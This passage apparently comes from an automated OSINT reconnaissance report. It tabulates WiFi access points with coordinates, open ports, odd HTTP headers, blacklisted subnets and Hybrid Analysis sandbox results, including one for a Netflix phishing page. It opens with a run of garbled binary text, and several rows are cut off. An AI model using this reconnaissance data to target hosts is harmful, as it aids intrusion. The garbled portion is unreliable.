Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: thewiki.moe\nDNT: 1\nConnection: Keep-Alive"\n "}vG\nCWirDKlm-Re-@(\n\\y/Xr}\\nkddddDdd?z%{_\n<r=f0[]}_||,zpQ*2AO?COL2-d/IY~>),rI_g_=W%6a`s1{2R"ky2-t0J#"}M_s)=R:U(t`&Y2q|rF0zt]<iY&Vz,?XNS#]pEczz5TM9I$W)@(Ia<`ge(n/\'|nVXnwT)yvKeO\'d)g2+9]e.?eQOT2>WuA=9\nj)\'BDZtm9)cqg&\\2fe"e?}\nPkxdd2$mNz\\w.Ke(P^<KKe\n=KEeV>@<J")m\nkSQxMD/\\NJt.aH"d3NV+rsn.s\nMP<FbQN>2[.NY>2ILK\n*5|ay0m<%JY(A9dfK\\DV\nQXXw|>zz/|)zXvw?\\sAL\'RsEP.FCcU&%=OR2D,}P\'yy\nt@lb`@2}9h/`kNOLq\nXN~o\n 7UEnVf`XYf0@Vdsga$-yG#Ny~X^\n$,gI19&\n<{N3*i\\)-@1P%fn/nA\\bZ2MjABLK#8\\L3\'>p9*fF4f"[Ss[1\n*IQ\n675"#H1AK1M<{]d %DQdM4tg1)*INpD8&2+y\\nS8qlk!0dixv|RKI*\n]}H@oZRE"/U#Bb(FH(_2n:2[\nySOt}(Ke9[$4/r\n]`]$vA\nKpBH\nE.Z?_Qyr0t\n%\'<P3F:lHl9JsRO4$MHA\n@"\nUB`m!}#l!SHYv4"hkI\n2)3w+AM/9c.3`2\nys84bV5H`{ -ezV.3gt{KdPxXORQdt0\n\\(Ci`] l7wE6_T%9]c%v6j<+eQv cVsR\\)A~p_43M0r{W@;WfbN#AAKa>@IAIej-XaT5Lbap6Hv%a9*%Q*f\nc2cVjO@4\nJzT$OP`_|skYMC5JTXB4<L6s=A3A@v\n+g\n4c@=av464PmpV#V@;a"9t/7|<#(0Jj/}L4F\n,_{Qq>1Ybo\'\\bck<\\`yMjV!Hqss5__Q_l52V?|9L\n$q0rV+i"5Md/bv9A"KTkEWJ}H%EWQdOeF&Ac]7bjn\nOHq*(H.0e18mP||*fN)K$.^SviQ\\mc0{Q\'j?\\dR|^O9fXi\'8uq&hQD"#^s_`|+vo&u:d"=a.az_ReXVm4R#RI4rTSueK\\N\neKqH>>G;.Di8,mDQ29EiHA:"5{9HVDDqK6xm*hI\n#I&B_#t_1Ss)h{Z{xRQDaPk^2`7O/vy%VnoHg1~5+mxG\nU]uGLa`XdYD{PydV$eL2[G"|E]DvQ7y.fPp:\ne\nhlNqQEVp=GgQ%~;sR4&Ev$uWm+W&F%6"?`r\n~vwS*F^0owy&v9snM\n4T\n!)uV]"/WeP9vl*[D@+6%#\nw*o Vi,>n5[kcuvvr}udQ 2G42!\nXl9bK\'&x`*Pzgi[j3^f\\NP^OP8dzuJZPfTNbl7 TqqI~CRU0$<P\\W\n5US8\nPx?,/:,c=`igo}oCsH.~o>S9kcv*,7^U9Eo;MA\\\n"ToQJRbDQ/|w|\n)^{A.PU.%X#VAe\nT!wwGWS\nC8"#Ksg77,(Rw9J+R|fV+X~v4muQQ[k\n\'j3Tp5>O_R#UfaHt2^Z\'RdoR\n/\nwg=[+KB#<N"McoktG>l`asGNCDjmtA(^:T5-Qj"H!8inMMNP!mP6_5QSqaXcWH9F<F2Z*4NeE19ts<QG%)h7-;zW-}+Ml*rV\\U<A | 185.199.111.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:01:24:F0:65:67) | 37.780462,-122.390564 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | JIVE5.02025B0 (Net ID: 00:01:9F:20:25:B4) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:03:23 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dontkillmyapp.com | 000.dontkillmyapp.com |
| 2023-05-12 02:51:18 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://swetapanda25.github.io/netflix', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "IsoScope_55c_IE_EarlyTabStart_0xfc8_Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_55c_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_55c_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1372"\n "IsoScope_55c_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "IsoScope_55c_ConnHashTable<1372>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_55c_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_55c_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_55c_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "45.57.90.1:443"\n "104.17.24.14:443"\n "52.217.109.118:443"\n "104.18.23.52:443"\n "156.146.53.12:443"\n "142.250.191.42:443"\n "172.64.101.10:443"\n "142.251.32.35:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "cdnjs.cloudflare.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "ka-f.fontawesome.com"\n "kit.fontawesome.com"\n "maxst.icons8.com"\n "s3.amazonaws.com"\n "swetapanda25.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"RS-en-20191230-popsignuptwoweeks-perspective_alpha_website_large_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3" and extension "jpg"\n "device-pile_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "mobile_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"\n "netflix-logo_1_.png" has type "PNG image data 800 x 454 8-bit/color RGBA non-interlaced" and extension "png"\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "RS-en-20191230-popsignuptwoweeks-perspective_alpha_website_large_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "la-solid-900_1_.eot" has type "Embedded OpenType (EOT) la-solid-900 family"- [targetUID: N/A]\n "free-fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Solid family"- [targetUID: N/A]\n "device-pile_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "line-awesome.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002944]\n "free.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "mobile_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced"- [targetUID: N/A]\n "free-fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Regular family"- [targetUID: N/A]\n "la-regular-400_1_.eot" has type "Embedded OpenType (EOT) la-regular-400 family"- [targetUID: N/A]\n "netflix-logo_1_.png" has type "PNG image data 800 x 454 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "free-v4-shims.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "~DF4D4C34410C8CB14F.TMP" has type "data"- Location: [%TEMP%\\~DF4D4C34410C8CB14F.TMP]- [targetUID: 00000000-00001372]\n "KFOmCnqEu92Fr1Mu4mxM_1_.woff" has type "Web Open Font Format TrueType length 20344 version 1.1"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001372]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFBF16C55F4A9DB7BF.TMP" has type "data"- Location: [%TEMP%\\~DFBF16C55F4A9DB7BF.TMP]- [targetUID: 00000000-00001372]\n "~DFC0EEDE33BE2CC194.TMP" has type "data"- Location: [%TEMP%\\~DFC0EEDE33BE2CC194.TMP]- [targetUID: 00000000-00001372]\n "~DFBD381075CECC3207.TMP" has type "data"- Location: [%TEMP%\\~DFBD381075CECC3207.TMP]- [targetUID: 00000000-00001372]\n "~DF5B418C84D2916DCF.TMP" has type "data"- Location: [%TEMP%\\~DF5B418C84D2916DCF.TMP]- [targetUID: 00000000-00001372]\n "tv_1_.png" has type "PNG image data 640 x 480 8-bit colormap non-interlaced"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text with CRLF line terminators"- [targetUID: N/A]\n "normalize_1_.css" has type "ASCII text"- [targetUID: N/A]\n "urlref_httpsswetapanda25.github.ionetflix" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: N/A]\n "RecoveryStore._F06AC279-EEB8-11ED-B011-080027D24051_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_FAB59712-EEB8-11ED-B011-080027D24051_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_783E07C8-EEB9-11ED-B011-080027D24051_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_F06AC27B-EEB8-11ED-B011-080027D24051_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "free-v4-font-face.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "QATBOYWK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QATBOYWK.txt]- [targetUID: 00000000-00002944]\n "1FJ2HCAV.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1FJ2HCAV.txt]- [targetUID: 00000000-00001372]\n "A30Y0SY7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\A30Y0SY7.txt]- [targetUID: 00000000-00001372]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002944]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "css_4_.css" has type "ASCII text"- [targetUID: N/A]\n "css_3_.css" has type "ASCII text"- [targetUID: N/A]\n "css_2_.css" has type "ASCII text"- [targetUID: N/A]\n "netflix_1_.htm" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: N/A]\n "L1BWWITO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\L1BWWITO.txt]- [targetUID: 00000000-00002944]\n "FC0DBXJC.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FC0DBXJC.txt]- [targetUID: 00000000-00001372]\n "IPZFT29F.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\IPZFT29F.txt]- [targetUID: 00000000-00001372]\n "TMY19XG9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TMY19XG9.txt]- [targetUID: 00000000-00001372]\n "CabCED0.tmp" has type "data"- Location: [%TEMP%\\CabCED0.tmp]- [targetUID: 00000000-00002944]\n "CabCF10.tmp" has type "data"- Location: [%TEMP%\\CabCF10.tmp]- [targetUID: 00000000-00002944]\n "netflix_2_.htm" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts random domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u | 185.199.108.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | E3 (Net ID: 00:00:72:20:5B:C1) | 37.7813933,-122.3918002 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | guventip (Net ID: 00:15:56:68:31:96) | 40.2024, 29.0398 |
| 2023-05-12 03:08:51 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.123 | 34.148.97.127 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 1 | 2 | 0 | None | 87.248.157.102:3306 | 87.248.157.102 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <hidden ssid> (Net ID: 00:01:E3:55:27:34) | 52.3759, 4.8975 |
| 2023-05-12 02:45:53 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 27, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://rufus.ie/es', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-22', u'name': u'Fails to load modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" failed to load missing module "MDMRegistration.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "netapi32.dll" - [base:0; Status:c000000d]'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:6172:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6172:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "InternetShortcutMutex"\n "Local\\SM0:6300:304:WilStaging_02"\n "SM0:6300:120:WilError_01"\n "Local\\SM0:6300:120:WilError_01"\n "HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_DavidM_Mutex"\n "SM0:6172:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "SM0:6172:120:WilError_01"\n "Local\\SM0:6172:304:WilStaging_02"\n "HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_MarkM_Mutex"\n "Local\\SM0:6172:120:WilError_01"\n "HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_ZiraM_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_DavidM_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_MarkM_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_ZiraM_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:6172:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6172:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"\n "104.16.87.20:443"\n "142.250.191.66:443"\n "172.217.164.98:443"\n "142.250.189.226:443"\n "142.250.191.65:443"\n "172.217.164.97:443"\n "142.251.46.170:443"\n "172.217.12.99:443"\n "142.250.189.164:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"rufus.ie"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.ampproject.org"\n "cdn.jsdelivr.net"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "googleads.g.doubleclick.net"\n "pagead2.googlesyndication.com"\n "pages.github.com"\n "partner.googleadservices.com"\n "rufus.ie"\n "tpc.googlesyndication.com"\n "www.googletagservices.com"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'""paypal.com"," (Indicator: "paypal")\n ""baysidebuddy.com"," (Indicator: "ebuddy.com")\n ""comeherebuddy.com"," (Indicator: "ebuddy.com")\n ""www.facebook.com"," (Indicator: "facebook.com")\n ""linkedin.com"," (Indicator: "linkedin.com")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-203', u'name': u'Tries to access LNK files (Windows shortcut)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Microsoft Edge.lnk"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00006172]\n "wallet-pre-stable.json" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Wallet\\112.15166.0.0\\json\\wallet\\wallet-pre-stable.json]- [targetUID: 00000000-00006172]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\6172_291333511\\edge_driver.js]- [targetUID: 00000000-00006172]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\6172_1489855770\\Filtering Rules]- [targetUID: 00000000-00006172]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Wallet\\112.15166.0.0\\wallet.bundle.js]- [targetUID: 00000000-00006172]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00006172]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006172]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\6172_291333511\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00006172]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\6172_291333511\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00006172]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "miniwallet.bundle.js" has type "ASCII text with very long lines"- Location: [%TEMP%\\6172_291333511\\Mini-Wallet\\miniwallet.bundle.js]- [targetUID: 00000000-00006172]\n "notification.bundle.js" has type "ASCII text with very long lines"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Wallet\\112.15166.0.0\\Notification\\notification.bundle.js]- [targetUID: 00000000-00006172]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00006172]\n "401133ff-05ec-43b1-ab6f-629b883c0cff.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 10409"- [targetUID: N/A]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\6172_1489855770\\Filtering Rules-AA]- [targetUID: 00000000-00006172]\n "f82bf96b-55aa-4803-b143-b4981d8f9ae9.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 17314"- [targetUID: N/A]'}, {u'category': u'Installatio | 185.199.111.153 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.172): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.149): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | sflan7_1 (Net ID: 00:02:6F:04:08:D7) | 37.7642, -122.3993 |
| 2023-05-12 02:54:03 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c52e4b1988e1e3e-FRA
Content-Encoding: gzip
| 172.67.135.9 |
| 2023-05-12 02:54:13 | Linked URL - Internal | No | Web Spider | 4 | 0 | 2 | 0 | None | https://battleb0t.xyz/main.built.js | https://battleb0t.xyz/ |
